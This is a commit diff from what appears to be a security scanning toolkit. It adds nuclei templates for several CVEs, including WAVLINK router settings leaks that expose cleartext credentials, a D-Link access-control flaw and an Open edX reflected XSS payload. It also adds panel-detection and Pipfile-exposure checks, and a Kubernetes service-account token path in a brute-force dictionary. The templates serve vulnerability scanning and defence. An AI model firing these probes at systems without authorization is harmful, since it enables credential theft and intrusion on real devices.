up PoCs 2022-08-16

Author: hktalent

brute/dicts/filedic.txt

@@ -1,3 +1,4 @@
+/fs/var/run/secrets/kubernetes.io/serviceaccount/token
 !.htaccess
 !.htpasswd
 ".t.jsp

config/nuclei-templates/cves/2020/CVE-2020-12127.yaml

@@ -0,0 +1,36 @@
+id: CVE-2020-12127
+
+info:
+  name: WAVLINK WN530H4 M30H4.V5030.190403 - Information Disclosure
+  author: arafatansari
+  severity: high
+  description: |
+    An information disclosure vulnerability in the /cgi-bin/ExportAllSettings.sh endpoint of the WAVLINK WN530H4 M30H4.V5030.190403 allows an attacker to leak router settings, including cleartext login details, DNS settings, and other sensitive information without authentication.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-12127
+  classification:
+    cve-id: CVE-2020-12127
+  metadata:
+    verified: true
+    shodan-query: http.html:"Wavlink"
+  tags: cve,cve2020,wavlink,exposure
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/cgi-bin/ExportAllSettings.sh"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'Login='
+          - 'Password='
+          - 'Model='
+          - 'AuthMode='
+        condition: and
+
+      - type: status
+        status:
+          - 200

config/nuclei-templates/cves/2022/CVE-2022-28955.yaml

@@ -0,0 +1,38 @@
+id: CVE-2022-28955
+
+info:
+  name: D-Link DIR816L - Access Control
+  author: arafatansari
+  severity: high
+  description: |
+    An access control issue in D-Link DIR816L_FW206b01 allows unauthenticated attackers to access folders folder_view.php and category_view.php.
+  reference:
+    - https://github.com/shijin0925/IOT/blob/master/DIR816/1.md
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-28955
+    - https://www.dlink.com/en/security-bulletin/
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2022-28955
+    cwe-id: CWE-287
+  metadata:
+    shodan-query: http.html:"DIR-816L"
+    verified: "true"
+  tags: cve,cve2022,dlink,exposure
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/category_view.php"
+      - "{{BaseURL}}/folder_view.php"
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '<title>SharePort Web Access</title>'
+
+      - type: status
+        status:
+          - 200

config/nuclei-templates/cves/2022/CVE-2022-31846.yaml

@@ -0,0 +1,39 @@
+id: CVE-2022-31846
+
+info:
+  name: WAVLINK WN535 G3 - Information Disclosure
+  author: arafatansari
+  severity: high
+  description: |
+    A vulnerability is in the 'live_mfg.shtml' page of the WAVLINK WN535 G3,Firmware package version M35G3R.V5030.180927
+  reference:
+    - https://github.com/pghuanghui/CVE_Request/blob/main/WAVLINK%20WN535%20G3__live_mfg.md
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-31846
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30489
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2022-31846
+    cwe-id: CWE-668
+  metadata:
+    shodan-query: http.html:"Wavlink"
+    verified: "true"
+  tags: cve,cve2022,wavlink,exposure
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/live_mfg.shtml"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - 'Model='
+          - 'DefaultIP='
+          - 'LOGO1='
+        condition: and
+
+      - type: status
+        status:
+          - 200

config/nuclei-templates/cves/2022/CVE-2022-32195.yaml

@@ -0,0 +1,43 @@
+id: CVE-2022-32195
+
+info:
+  name: Open edX - Cross-site Scripting
+  author: arafatansari
+  severity: medium
+  description: |
+    Open edX platform before 2022-06-06 allows Reflected Cross-site Scripting via the "next" parameter in the logout URL.
+  reference:
+    - https://discuss.openedx.org/t/security-patch-for-logout-page-xss-vulnerability/7408
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-32195
+    - https://github.com/edx
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2022-32195
+    cwe-id: CWE-79
+  metadata:
+    comment: Hover the cursor on the redirect link
+    shodan-query: http.html:"Open edX"
+    verified: "true"
+  tags: cve,cve2022,openedx,xss
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/logout?next=%208%22onmouseover=%22alert(document.domain)'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<a href="+8"onmouseover="alert(document.domain)">click here to go to'
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200

config/nuclei-templates/exposed-panels/concrete5/concrete5-install.yaml

@@ -8,26 +8,28 @@ info:
   reference:
     - https://documentation.concretecms.org/developers/introduction/installing-concrete-cms
   metadata:
+    verified: true
     shodan-query: http.title:"Install concrete5"
-  tags: panel,concrete,cms
+  tags: panel,install,concrete,cms
 
 requests:
   - method: GET
     path:
       - "{{BaseURL}}/index.php/install"
       - "{{BaseURL}}/concrete5/index.php/install"
 
+    stop-at-first-match: true
     matchers-condition: and
     matchers:
-      - type: status
-        status:
-          - 200
-
       - type: word
         part: body
         words:
           - '<title>Install concrete5</title>'
 
+      - type: status
+        status:
+          - 200
+
     extractors:
       - type: regex
         part: body

config/nuclei-templates/exposed-panels/dzzoffice/dzzoffice-install.yaml

@@ -0,0 +1,34 @@
+id: dzzoffice-install
+
+info:
+  name: DzzOffice Exposed Installation
+  author: ritikchaddha
+  severity: high
+  metadata:
+    verified: true
+    shodan-query: http.favicon.hash:-1961736892
+    fofa-query: title="dzzoffice"
+  tags: dzzoffice,install
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/install/index.php"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'DzzOffice'
+
+      - type: word
+        part: body
+        words:
+          - '简体中文 UTF8 版'
+          - 'Simplified Chinese UTF8 version'
+        condition: or
+
+      - type: status
+        status:
+          - 200

config/nuclei-templates/exposed-panels/dzzoffice/dzzoffice-panel.yaml

@@ -0,0 +1,34 @@
+id: dzzoffice-panel
+
+info:
+  name: DzzOffice Panel Detect
+  author: ritikchaddha
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: http.favicon.hash:-1961736892
+  tags: dzzoffice,panel
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+      - "{{BaseURL}}/index.php"
+      - "{{BaseURL}}/user.php?mod=login"
+
+    stop-at-first-match: true
+    redirects: true
+    max-redirects: 2
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'content="DzzOffice'
+          - 'DZZSCRIPT'
+          - "dzzoffice.com"
+        condition: or
+
+      - type: status
+        status:
+          - 200

config/nuclei-templates/exposed-panels/jupyter-notebook.yaml

@@ -23,6 +23,7 @@ requests:
     stop-at-first-match: true
     redirects: true
     max-redirects: 2
+    matchers-condition: and
     matchers:
       - type: word
         part: body

config/nuclei-templates/exposed-panels/led-imediacloud-panel.yaml

@@ -0,0 +1,26 @@
+id: led-imediacloud-panel
+
+info:
+  name: LEDiMediaCloud Panel Detect
+  author: ritikchaddha
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: http.html:"LEDiMediaCloud"
+  tags: panel,led,mediacloud
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/login"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'LEDiMediaCloud'
+
+      - type: status
+        status:
+          - 200

config/nuclei-templates/exposed-panels/pichome-panel.yaml

@@ -0,0 +1,32 @@
+id: pichome-panel
+
+info:
+  name: Pichome Panel Detect
+  author: ritikchaddha
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: http.favicon.hash:933976300
+  tags: pichome,panel
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+      - "{{BaseURL}}/user.php?mod=login"
+
+    stop-at-first-match: true
+    redirects: true
+    max-redirects: 2
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'Powered By oaooa PicHome'
+          - 'content="oaooa"'
+        condition: or
+
+      - type: status
+        status:
+          - 200

config/nuclei-templates/exposures/configs/pipfile-config.yaml

@@ -0,0 +1,28 @@
+id: pipfile-config
+
+info:
+  name: Pipfile Configuration Exposure
+  author: DhiyaneshDK
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: html:"Pipfile"
+  tags: exposure,pip,devops,cicd
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/Pipfile"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '[[source]]'
+          - '[packages]'
+        condition: and
+
+      - type: status
+        status:
+          - 200

config/nuclei-templates/exposures/files/pipfile-lock.yaml

@@ -0,0 +1,28 @@
+id: pipfile-lock
+
+info:
+  name: Pipfile.lock Disclosure
+  author: DhiyaneshDK
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: html:"Pipfile"
+  tags: exposure,pip,devops,cicd
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/Pipfile.lock"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"pipfile-spec":'
+          - '"requires"'
+        condition: and
+
+      - type: status
+        status:
+          - 200